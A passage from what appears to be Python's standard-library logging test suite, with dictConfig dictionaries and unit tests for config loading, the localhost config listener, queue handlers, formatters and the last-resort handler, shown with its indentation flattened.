'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
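    # The '9' entry above is the bad argument: leftover handler keys are passed
    # to the handler factory as keyword arguments and must be valid identifiers,
    # so test_config6_failure expects dictConfig to raise.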
    # config7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
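    # config9a and config9b are incremental configs ('incremental': True): they
    # only adjust the levels of the handlers and loggers already configured by
    # config9, which is what test_config_9_ok below relies on.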
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
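    # filt1 is a standard logging.Filter named 'compiler.parser', so only
    # records from that logger or its descendants pass the handler and logger
    # filters; see test_config_10_ok below.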
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
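    # The cfg:// values are resolved against this same dictionary at
    # configuration time, e.g. 'cfg://handler_configs[hand1]' yields the dict
    # under 'handler_configs' -> 'hand1'; test_baseconfig below exercises the
    # same access syntax directly.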
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
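    # The '.' mapping lists extra attributes to set on the constructed handler;
    # test_config14_ok checks that hand1 gains foo == 'bar' and the custom
    # terminator.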
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
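    # bufferGlobal names fileGlobal as its target even though handlers can be
    # listed in any order; test_out_of_order only checks that the target is
    # resolved to a Handler and that the '$' style yields StringTemplateStyle.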
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
        # config2 points its handler at a misspelt stream (ext://sys.stdbout)
        # and should fail to apply.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
        # config2a has a misspelt level ('NTOSET') on its handler and should
        # fail to apply.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
        # config2b has a misspelt level ('WRANING') on the root logger and
        # should fail to apply.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
        # config3 references a misspelled formatter name and should fail to
        # apply.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
    # Same as test_config7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
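            # The listener expects a 4-byte big-endian length prefix ('>L')
            # followed by the configuration payload.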
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(False and hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self): # TODO add QueueListener after threading
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
if False and hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
@support.reap_threads
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@support.requires_multiprocessing_queue
@patch.object(logging.handlers.QueueListener, 'handle')
@support.reap_threads
def test_handle_called_with_mp_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
@support.requires_multiprocessing_queue
@support.reap_threads
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
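# Minimal fixed-offset tzinfo; FormatterTest.test_time uses it to build an
# aware datetime before converting to local time.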
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
@unittest.skipIf(cosmo.MODE == "tiny", "fails only in MODE=tiny")
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
